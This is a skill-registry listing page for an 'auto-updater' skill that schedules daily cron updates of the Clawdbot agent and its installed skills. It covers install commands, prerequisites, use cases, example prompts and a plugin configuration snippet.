ClawKit Logo
ClawKitReliability Toolkit
Back to Registry
Official Verified utilities Safety 4/5

auto-updater

Automatically update Clawdbot and all installed skills once daily. Runs via cron, checks for updates, applies them, and messages the user with a summary of what changed.

Why use this skill?

Keep your OpenClaw agent running at peak performance. Auto-updater automatically manages daily updates for Clawdbot and all your installed skills via cron.

skill-install — Terminal

Install via CLI (Recommended)

clawhub install openclaw/skills/skills/hightower6eu/auto-updater-hfmct
Or

What This Skill Does

The auto-updater skill is a vital utility for OpenClaw users who want to maintain a high-performing and secure agent environment with minimal manual intervention. By leveraging a scheduled cron job, this skill automates the otherwise tedious process of keeping your Clawdbot framework and individual installed skills at their latest versions. It performs a comprehensive update cycle: first checking for core system updates for Clawdbot, followed by scanning all registered skills via clawdhub to identify pending updates. Once the process completes, the skill generates a structured report, detailing which components were upgraded, version jumps, and which skills remain current. This ensures your agent is always running the latest patches, performance optimizations, and security fixes released by developers.

Installation

Installation requires the prior setup of the openclaw-agent utility. Without this agent, the system cannot perform the necessary file-system operations or cron scheduling required for background updates.

  1. Install the agent: Follow the OS-specific instructions for Windows or macOS provided in the core setup guide.
  2. Add the skill: Run clawhub install openclaw/skills/skills/hightower6eu/auto-updater-hfmct in your terminal.
  3. Initialize: Once installed, either use the quick-start prompt or manually define your cron schedule via clawdbot cron add to specify your preferred update window.

Use Cases

  • Production Environments: Ideal for users running long-term automation tasks who cannot afford broken integrations due to outdated skill versions.
  • Maintenance Optimization: Perfect for developers or power users who manage dozens of skills and want to avoid checking for updates manually every morning.
  • Version Consistency: Ensures that if a skill requires a specific core Clawdbot feature or dependency, the update process synchronizes these dependencies correctly using clawdbot doctor.

Example Prompts

  1. "Set up daily auto-updates for yourself and all your skills."
  2. "Update all my skills now and let me know if there are any breaking changes in the latest versions."
  3. "Show me the status of my current skill versions and when the next auto-update is scheduled to run."

Tips & Limitations

  • Prerequisite Reliance: The skill will fail silently if the openclaw-agent is not running. Verify the agent process status before troubleshooting update failures.
  • Cron Scheduling: We recommend setting the update time to off-peak hours (e.g., 4:00 AM) to ensure the system is not actively executing intensive tasks when the update process begins.
  • Manual Verification: Always run clawdhub update --all --dry-run if you are concerned about potential breaking changes before allowing the automated process to commit to an update.

Metadata

Stars2387
Views0
Updated2026-03-09
View Author Profile
AI Skill Finder

Not sure this is the right skill?

Describe what you want to build — we'll match you to the best skill from 16,000+ options.

Find the right skill
Add to Configuration

Paste this into your clawhub.json to enable this plugin.

{
  "plugins": {
    "official-hightower6eu-auto-updater-hfmct": {
      "enabled": true,
      "auto_update": true
    }
  }
}

Tags(AI)

#maintenance#automation#updates#background-task#utilities
Safety Score: 4/5

Flags: file-write, code-execution